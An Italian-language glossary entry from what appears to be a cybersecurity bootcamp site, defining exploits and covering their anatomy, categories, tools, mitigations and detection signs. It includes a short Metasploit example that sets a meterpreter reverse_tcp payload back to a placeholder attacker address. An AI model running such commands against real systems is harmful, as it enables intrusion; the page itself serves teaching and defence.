Vai al contenuto

Prossima edizione 6 luglio 2026

Sicurezza offensiva

Exploit

Pezzo di codice, sequenza di comandi o tecnica che sfrutta una vulnerabilità in software, hardware o comportamento umano per causare conseguenze indesiderate come esecuzione di codice da remoto, escalation di privilegi, denial of service o divulgazione di informazioni.

Autore
Unihackers Team
Tempo di lettura
2 min di lettura
Ultimo aggiornamento

Perché È Importante

Ogni attacco significativo prima o poi converte una vulnerabilità in impatto, e questa conversione è il lavoro di un exploit. Comprenderli è essenziale per i professionisti offensivi, i difensori che li rilevano e gli ingegneri che costruiscono software resistente.

WannaCry (2017) ha usato l'exploit EternalBlue (CVE-2017-0144) per propagarsi a milioni di sistemi. ProxyLogon (2021) ha compromesso decine di migliaia di organizzazioni. L'ondata di sfruttamento di Ivanti Connect Secure nel 2024 ha mostrato quanto rapidamente il codice exploit venga armato dopo la divulgazione.

Anatomia di un Exploit

Trigger Iniziale

Il percorso di codice vulnerabile viene raggiunto, spesso tramite input artigianali che violano invarianti assunte.

Costruzione delle Primitive

Gli exploit di corruzione memoria concatenano primitive come lettura/scrittura arbitraria e information leak.

Esecuzione del Codice

Una volta dirottato il controllo, l'exploit esegue codice dell'attaccante: shellcode, loader riflettivi, catene ROP.

Post-Sfruttamento

Persistenza, escalation di privilegi, movimento laterale, consegna del payload, spesso con malware staged separatamente.

Categorie

CategoriaBersaglioEsempi
Corruzione memoriaProgrammi C/C++Buffer overflow, UAF, type confusion
Applicazioni webServizi HTTPSQLi, XSS, SSRF, deserializzazione
LogiciSemantica applicativaBypass auth, IDOR, race condition
CrittograficiImplementazioni crittografichePadding oracle, RNG debole
HardwareCPU/firmwareSpectre, Meltdown, Rowhammer
Ingegneria socialeUmaniPhishing

Framework

esempio-msf.sh
Bash
# Esempio Metasploit
msfconsole
> search type:exploit cve:2024
> use exploit/multi/http/esempio_rce
> set RHOSTS 10.0.0.5
> set LHOST 10.0.0.10
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
> run
  • Metasploit Framework
  • Cobalt Strike
  • Sliver (C2 open-source)
  • pwntools
  • GDB / pwndbg / WinDbg

Mitigazioni

  1. Gestione patch focalizzata su CISA KEV.
  2. Linguaggi memory-safe (Rust, Go).
  3. Mitigazioni OS e compilatore.
  4. EDR con prevenzione exploit.
  5. Sandboxing applicativo.
  6. Segmentazione di rete.
  7. Privilegio minimo.

Rilevamento

  • Processi figli inattesi da browser o Office
  • Iniezione DLL o attività in-memory sospetta
  • Binari non firmati da percorsi scrivibili
  • Beaconing anomalo post-sfruttamento

Concetti Correlati

Nel Bootcamp

Come insegniamo Exploit

Nel nostro Cybersecurity Bootcamp, non imparerai solo la teoria su Exploit. Praticherai con strumenti reali in laboratori pratici, guidato da professionisti del settore che usano questi concetti quotidianamente.

Trattato in:

Modulo 10: Penetration Testing e Hacking Etico

Argomenti correlati che padroneggerai:MetasploitNmapBurp SuiteEscalation dei Privilegi
Scopri come lo insegniamo

360+ ore di formazione esperta • CompTIA Security+ incluso